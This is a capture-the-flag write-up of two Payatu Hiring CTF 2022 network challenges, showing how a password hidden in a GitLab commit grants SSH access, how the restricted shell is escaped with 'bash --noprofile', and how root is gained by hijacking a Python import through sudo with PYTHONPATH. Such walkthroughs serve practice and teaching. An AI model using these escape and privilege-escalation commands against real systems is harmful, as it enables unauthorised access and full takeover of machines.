Payatu Hiring CTF 2022
3 min readOct 15, 2022
Network 1,2 Writeup
Hello Guys , Today we Are Going to have a look at a cool Network x Osint Challenge from Payatu CTF 2022
1. Mistake — 1
Category: Network
Points :150
Mmm, Just an ordinary Site?
All of the hyperlinks are empty except the git lab
The GIT LAB
From The Above Image we know that the username is saddetail
- Lets Dig All The Commits
https://gitlab.com/saddetail/my-portfolio/-/commit/4bb3cb9ccbfdd3df589ae82b0b2576a1cf380f0b
2.OfCourse , just another Base64 !
GKxtH2IwqKWcqUxtD29hp3IfqTShqPOzpzyyozEmVTgyMKNtqTIfoTyhMlOgMFO0nTymVTymVUA0
qKOcMP4tDaI0VT9vqzyiqKAfrFO0nTymVTymVT5iqPOmqUIjnJDhVSEbMKxtLKWyVTc1p3DtMzIu
pz1iozqypaZfVUEbMKxtMJ52rFOgMFOvMJAuqKAyVRxtL29gMFO3nKEbVUA1L2ttL3WyLKEcqzHt
nJEyLKZhVSEbMKxtL2ShVUEun2HgLF1zMKpgpTSaMKZgMaWioF1grF1vo29eVTc1p3DtoTyeMFOgrFOjLKAmq29lMP4= 
take-a-few-pages-from-my-book (password)- So , We can Conclude that it is the password for Something
Back To The Challenge Description:
Note: When you find your way to the hotel, please note that Room № 22 is under repair, you can check in at Room № 9922 instead
Number 22 , denotes SSH
- All we need is just a host to do SSH on The custom port number
9922
HOST : mistake.payatu.lol
❯ host mistake.payatu.lol
payatu.lol has address 34.237.41.18(34.237.41.18 also used to do SSH)
Hurray ! , We are In
But We Are Restricted with RBASH
Restricted Shell:The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it
[+] Bypassing The restriction
-t "bash --noprofile "can be used to Bypass the Restrictions
ssh saddetail@34.237.41.18 -p 9922 -t "bash --noprofile"[1] Reading the file even in the restricted mode
saddetail@6dbb2a245253:~$ echo “`<flag.txt`”flag{w@tch_th0s3_3xtra_Co5mi3s}`
[2] By ByPassing The RBASH
flag{w@tch_th0s3_3xtra_Co5mi3s}Mistake -2
- So we need some privilege to Read the flag.txt at /root
saddetail@6dbb2a245253:~$ ls
__pycache__ bin flag.txt
[+] Library Hijacking using Python
saddetail@6dbb2a245253:/opt$ head script.py
try:
import os
import requests
import dummy
except ImportError:
print("Working Fine")def add(x, y):
return x + y
- Here
dummyis the custom library which can be created by us to exploit thescript.py
- create a file called
dummy.pyand write the payload in it
saddetail@6dbb2a245253:~$ cat dummy.py
import os
os.system("/bin/bash")2. Lets create a PYTHONPATH to access the root privilege ,
saddetail@6dbb2a245253:~$ sudo PYTHONPATH=/home/saddetail/ /usr/bin/python3 /opt/script.py[I'M ROOT ! ] root@6dbb2a245253:/home/saddetail# iduid=0(root) gid=0(root) groups=0(root)
COOL !
root@6dbb2a245253:/home/saddetail# cat flag.txtflag{w@tch_th0s3_3xtra_Co5mi3s}
